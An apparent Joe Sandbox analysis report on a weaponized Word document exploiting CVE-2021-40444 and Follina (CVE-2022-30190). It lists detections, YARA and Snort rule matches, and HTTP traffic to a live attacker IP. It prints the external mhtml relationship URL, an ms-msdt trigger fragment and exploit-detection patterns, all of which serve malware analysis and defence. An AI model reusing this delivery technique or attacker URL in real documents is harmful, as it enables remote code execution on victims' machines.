Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
5YMh6S8QVr

Overview

General Information

Sample Name:5YMh6S8QVr (renamed file extension from none to docx)
Analysis ID:646982
MD5:5a0d45f97ee4b248360b6b2e5eb4706a
SHA1:e2a00e3489ede1ac935c78b99f92fdce0e74ed69
SHA256:57b27abbe3d3c0c20cdc1b408ff6fa562ba5f04fa555cb3adb9dcb03e273b664
Tags:194-34-232-147doc
Infos:

Detection

CVE-2021-40444, Follina CVE-2022-30190
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Detected CVE-2021-40444 exploit
Snort IDS alert for network traffic
Contains an external reference to another file
Yara signature match
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Internet Provider seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 1300 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
document.xml.relsSUSP_Doc_WordXMLRels_May22Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitationTobias Michalski, Christian Burkard, Wojciech Cieslak
  • 0x39:$a1: <Relationships
  • 0x3e3:$a2: TargetMode="External"
  • 0x3b6:$x1: .html!
document.xml.relsEXPL_CVE_2021_40444_Document_Rels_XMLDetects indicators found in weaponized documents that exploit CVE-2021-40444Jeremy Brown / @alteredbytes
  • 0x374:$b1: /relationships/oleObject
  • 0x38e:$c1: Target="mhtml:http
  • 0x3bb:$c2: !x-usc:http
  • 0x3e3:$c3: TargetMode="External"
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\side[1].htmEXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitationTobias Michalski, Christian Burkard
  • 0x1970:$re1: location.href = "ms-msdt:
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\side[1].htmJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\side[1].htmEXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitationTobias Michalski, Christian Burkard
    • 0x1970:$re1: location.href = "ms-msdt:
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\side[1].htmJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\47FC82E2.htmEXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitationTobias Michalski, Christian Burkard
      • 0x1970:$re1: location.href = "ms-msdt:
      Click to see the 3 entries
      No Sigma rule has matched
      Timestamp:194.34.232.147192.168.2.2280491762036726 06/16/22-13:30:49.826105
      SID:2036726
      Source Port:80
      Destination Port:49176
      Protocol:TCP
      Classtype:Attempted User Privilege Gain

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: 5YMh6S8QVr.docxAvira: detected
      Source: 5YMh6S8QVr.docxVirustotal: Detection: 50%Perma Link
      Source: 5YMh6S8QVr.docxMetadefender: Detection: 31%Perma Link

      Exploits

      barindex
      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\side[1].htm, type: DROPPED
      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\side[1].htm, type: DROPPED
      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\47FC82E2.htm, type: DROPPED
      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\34450540.htm, type: DROPPED
      Source: document.xml.relsExtracted files from sample: mhtml:http://194.34.232.147/side.html!x-usc:http://194.34.232.147/side.html
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 194.34.232.147:80
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 194.34.232.147:80

      Networking

      barindex
      Source: TrafficSnort IDS: 2036726 ET EXPLOIT Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190) 194.34.232.147:80 -> 192.168.2.22:49176
      Source: global trafficHTTP traffic detected: GET /side.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 194.34.232.147Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /side.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 194.34.232.147If-Modified-Since: Mon, 30 May 2022 20:51:09 GMTIf-None-Match: "1a76-5e040d0ca4940-gzip"Connection: Keep-Alive
      Source: Joe Sandbox ViewASN Name: DEDIPATH-LLCUS DEDIPATH-LLCUS
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 16 Jun 2022 11:30:45 GMTServer: Apache/2.4.29 (Ubuntu)Last-Modified: Mon, 30 May 2022 20:51:09 GMTETag: "1a76-5e040d0ca4940-gzip"Accept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 289Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 ed d9 4d 4b c3 30 18 07 f0 fb 60 df 21 16 61 db c1 06 f4 a6 ad e2 db 60 20 32 9c 30 0f 82 a4 c9 b3 36 98 36 25 89 d4 7e 7b 93 81 03 6f 9e c4 c3 3f 04 9e bc 3e bf e4 fc 14 47 ca ca 30 f6 c4 9a d0 9a cb e9 a4 48 91 19 d1 d5 65 46 5d 96 56 2a ab c6 14 bd 74 ba 0f 71 c4 f9 f5 1f 34 38 70 e0 c0 81 03 07 0e 1c 38 70 e0 c0 81 03 07 0e 1c 38 70 e0 c0 81 03 07 0e 9c ff eb b0 d8 06 dd 29 3b e4 c6 4a 11 b4 ed f2 c6 d1 8e 95 2c 6b fd 49 eb 55 38 e7 5a b1 f5 ed f6 4e 8b ba b3 3e 68 c9 b8 7f d7 3d db 59 27 89 f1 5e 38 d1 b2 d7 6c f5 fc f6 44 95 b3 83 a7 a5 75 4b 6d a8 94 c2 5c 49 16 37 36 64 48 86 b5 b3 75 3c 5b 3e da f0 a0 7d 20 95 b6 6e 7e dc 68 8e e7 ab fb 97 f9 2c de 94 39 7d d2 6c b1 d0 3c cf 7f db b7 fb af 78 be 19 63 fa f6 ec 94 b7 bd d7 b5 0f 1f 55 4a 16 1f 99 5d 4c 27 05 3f 94 8b d2 e4 bb 86 c4 f7 65 a6 2f c8 88 30 4c 76 1a 00 00 Data Ascii: MK0`!a` 2066%~{o?>G0HeF]V*tq48p8p8p);J,kIU8ZN>h=Y'^8lDuKm\I76dHu<[>} n~h,9}l<xcUJ]L'?e/0Lv
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 16 Jun 2022 11:30:49 GMTServer: Apache/2.4.29 (Ubuntu)Last-Modified: Mon, 30 May 2022 20:51:09 GMTETag: "1a76-5e040d0ca4940-gzip"Accept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 289Keep-Alive: timeout=5, max=97Connection: Keep-AliveContent-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 ed d9 4d 4b c3 30 18 07 f0 fb 60 df 21 16 61 db c1 06 f4 a6 ad e2 db 60 20 32 9c 30 0f 82 a4 c9 b3 36 98 36 25 89 d4 7e 7b 93 81 03 6f 9e c4 c3 3f 04 9e bc 3e bf e4 fc 14 47 ca ca 30 f6 c4 9a d0 9a cb e9 a4 48 91 19 d1 d5 65 46 5d 96 56 2a ab c6 14 bd 74 ba 0f 71 c4 f9 f5 1f 34 38 70 e0 c0 81 03 07 0e 1c 38 70 e0 c0 81 03 07 0e 1c 38 70 e0 c0 81 03 07 0e 9c ff eb b0 d8 06 dd 29 3b e4 c6 4a 11 b4 ed f2 c6 d1 8e 95 2c 6b fd 49 eb 55 38 e7 5a b1 f5 ed f6 4e 8b ba b3 3e 68 c9 b8 7f d7 3d db 59 27 89 f1 5e 38 d1 b2 d7 6c f5 fc f6 44 95 b3 83 a7 a5 75 4b 6d a8 94 c2 5c 49 16 37 36 64 48 86 b5 b3 75 3c 5b 3e da f0 a0 7d 20 95 b6 6e 7e dc 68 8e e7 ab fb 97 f9 2c de 94 39 7d d2 6c b1 d0 3c cf 7f db b7 fb af 78 be 19 63 fa f6 ec 94 b7 bd d7 b5 0f 1f 55 4a 16 1f 99 5d 4c 27 05 3f 94 8b d2 e4 bb 86 c4 f7 65 a6 2f c8 88 30 4c 76 1a 00 00 Data Ascii: MK0`!a` 2066%~{o?>G0HeF]V*tq48p8p8p);J,kIU8ZN>h=Y'^8lDuKm\I76dHu<[>} n~h,9}l<xcUJ]L'?e/0Lv
      Source: unknownTCP traffic detected without corresponding DNS query: 194.34.232.147
      Source: unknownTCP traffic detected without corresponding DNS query: 194.34.232.147
      Source: unknownTCP traffic detected without corresponding DNS query: 194.34.232.147
      Source: unknownTCP traffic detected without corresponding DNS query: 194.34.232.147
      Source: unknownTCP traffic detected without corresponding DNS query: 194.34.232.147
      Source: unknownTCP traffic detected without corresponding DNS query: 194.34.232.147
      Source: unknownTCP traffic detected without corresponding DNS query: 194.34.232.147
      Source: unknownTCP traffic detected without corresponding DNS query: 194.34.232.147
      Source: unknownTCP traffic detected without corresponding DNS query: 194.34.232.147
      Source: unknownTCP traffic detected without corresponding DNS query: 194.34.232.147
      Source: unknownTCP traffic detected without corresponding DNS query: 194.34.232.147
      Source: unknownTCP traffic detected without corresponding DNS query: 194.34.232.147
      Source: unknownTCP traffic detected without corresponding DNS query: 194.34.232.147
      Source: unknownTCP traffic detected without corresponding DNS query: 194.34.232.147
      Source: unknownTCP traffic detected without corresponding DNS query: 194.34.232.147
      Source: unknownTCP traffic detected without corresponding DNS query: 194.34.232.147
      Source: unknownTCP traffic detected without corresponding DNS query: 194.34.232.147
      Source: unknownTCP traffic detected without corresponding DNS query: 194.34.232.147
      Source: unknownTCP traffic detected without corresponding DNS query: 194.34.232.147
      Source: unknownTCP traffic detected without corresponding DNS query: 194.34.232.147
      Source: unknownTCP traffic detected without corresponding DNS query: 194.34.232.147
      Source: unknownTCP traffic detected without corresponding DNS query: 194.34.232.147
      Source: unknownTCP traffic detected without corresponding DNS query: 194.34.232.147
      Source: unknownTCP traffic detected without corresponding DNS query: 194.34.232.147
      Source: unknownTCP traffic detected without corresponding DNS query: 194.34.232.147
      Source: unknownTCP traffic detected without corresponding DNS query: 194.34.232.147
      Source: unknownTCP traffic detected without corresponding DNS query: 194.34.232.147
      Source: unknownTCP traffic detected without corresponding DNS query: 194.34.232.147
      Source: unknownTCP traffic detected without corresponding DNS query: 194.34.232.147
      Source: unknownTCP traffic detected without corresponding DNS query: 194.34.232.147
      Source: unknownTCP traffic detected without corresponding DNS query: 194.34.232.147
      Source: unknownTCP traffic detected without corresponding DNS query: 194.34.232.147
      Source: unknownTCP traffic detected without corresponding DNS query: 194.34.232.147
      Source: unknownTCP traffic detected without corresponding DNS query: 194.34.232.147
      Source: unknownTCP traffic detected without corresponding DNS query: 194.34.232.147
      Source: unknownTCP traffic detected without corresponding DNS query: 194.34.232.147
      Source: unknownTCP traffic detected without corresponding DNS query: 194.34.232.147
      Source: unknownTCP traffic detected without corresponding DNS query: 194.34.232.147
      Source: unknownTCP traffic detected without corresponding DNS query: 194.34.232.147
      Source: unknownTCP traffic detected without corresponding DNS query: 194.34.232.147
      Source: unknownTCP traffic detected without corresponding DNS query: 194.34.232.147
      Source: unknownTCP traffic detected without corresponding DNS query: 194.34.232.147
      Source: unknownTCP traffic detected without corresponding DNS query: 194.34.232.147
      Source: unknownTCP traffic detected without corresponding DNS query: 194.34.232.147
      Source: unknownTCP traffic detected without corresponding DNS query: 194.34.232.147
      Source: unknownTCP traffic detected without corresponding DNS query: 194.34.232.147
      Source: unknownTCP traffic detected without corresponding DNS query: 194.34.232.147
      Source: unknownTCP traffic detected without corresponding DNS query: 194.34.232.147
      Source: unknownTCP traffic detected without corresponding DNS query: 194.34.232.147
      Source: ~WRS{77360496-4BBE-44C6-A84F-CB369D560D67}.tmp.0.drString found in binary or memory: http://194.34.232.147/side.html
      Source: ~WRF{F962F304-2A52-4E33-A96C-51EE6F4187D8}.tmp.0.drString found in binary or memory: http://194.34.232.147/side.html%
      Source: ~WRF{F962F304-2A52-4E33-A96C-51EE6F4187D8}.tmp.0.drString found in binary or memory: http://194.34.232.147/side.html%x-usc:http://194.34.232.147/side.html
      Source: ~WRF{F962F304-2A52-4E33-A96C-51EE6F4187D8}.tmp.0.drString found in binary or memory: http://194.34.232.147/side.htmlyX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F66410A8-679A-411F-AE8D-493633C1B9C5}.tmpJump to behavior
      Source: global trafficHTTP traffic detected: GET /side.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 194.34.232.147Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /side.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 194.34.232.147If-Modified-Since: Mon, 30 May 2022 20:51:09 GMTIf-None-Match: "1a76-5e040d0ca4940-gzip"Connection: Keep-Alive
      Source: document.xml.rels, type: SAMPLEMatched rule: SUSP_Doc_WordXMLRels_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, Wojciech Cieslak, description = Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02, hash = 62f262d180a5a48f89be19369a8425bec596bc6a02ed23100424930791ae3df0
      Source: document.xml.rels, type: SAMPLEMatched rule: EXPL_CVE_2021_40444_Document_Rels_XML date = 2021-09-10, author = Jeremy Brown / @alteredbytes, description = Detects indicators found in weaponized documents that exploit CVE-2021-40444, reference = https://twitter.com/AlteredBytes/status/1435811407249952772
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\side[1].htm, type: DROPPEDMatched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\side[1].htm, type: DROPPEDMatched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\47FC82E2.htm, type: DROPPEDMatched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\34450540.htm, type: DROPPEDMatched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
      Source: ~WRF{F962F304-2A52-4E33-A96C-51EE6F4187D8}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
      Source: 5YMh6S8QVr.docxVirustotal: Detection: 50%
      Source: 5YMh6S8QVr.docxMetadefender: Detection: 31%
      Source: 5YMh6S8QVr.LNK.0.drLNK file: ..\..\..\..\..\Desktop\5YMh6S8QVr.docx
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$Mh6S8QVr.docxJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR6882.tmpJump to behavior
      Source: classification engineClassification label: mal84.expl.evad.winDOCX@1/23@0/1
      Source: ~WRF{F962F304-2A52-4E33-A96C-51EE6F4187D8}.tmp.0.drOLE document summary: title field not present or empty
      Source: ~WRF{F962F304-2A52-4E33-A96C-51EE6F4187D8}.tmp.0.drOLE document summary: author field not present or empty
      Source: ~WRF{F962F304-2A52-4E33-A96C-51EE6F4187D8}.tmp.0.drOLE document summary: edited time not present or 0
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: 5YMh6S8QVr.docxInitial sample: OLE zip file path = word/media/image2.wmf
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: ~WRF{F962F304-2A52-4E33-A96C-51EE6F4187D8}.tmp.0.drInitial sample: OLE indicators vbamacros = False

      Persistence and Installation Behavior

      barindex
      Source: document.xml.relsExtracted files from sample: mhtml:http://194.34.232.147/side.html!x-usc:http://194.34.232.147/side.html
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts12
      Exploitation for Client Execution
      Path InterceptionPath Interception1
      Masquerading
      OS Credential Dumping1
      File and Directory Discovery
      Remote ServicesData from Local SystemExfiltration Over Other Network Medium2
      Non-Application Layer Protocol
      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS Memory1
      System Information Discovery
      Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth12
      Application Layer Protocol
      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
      Ingress Tool Transfer
      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
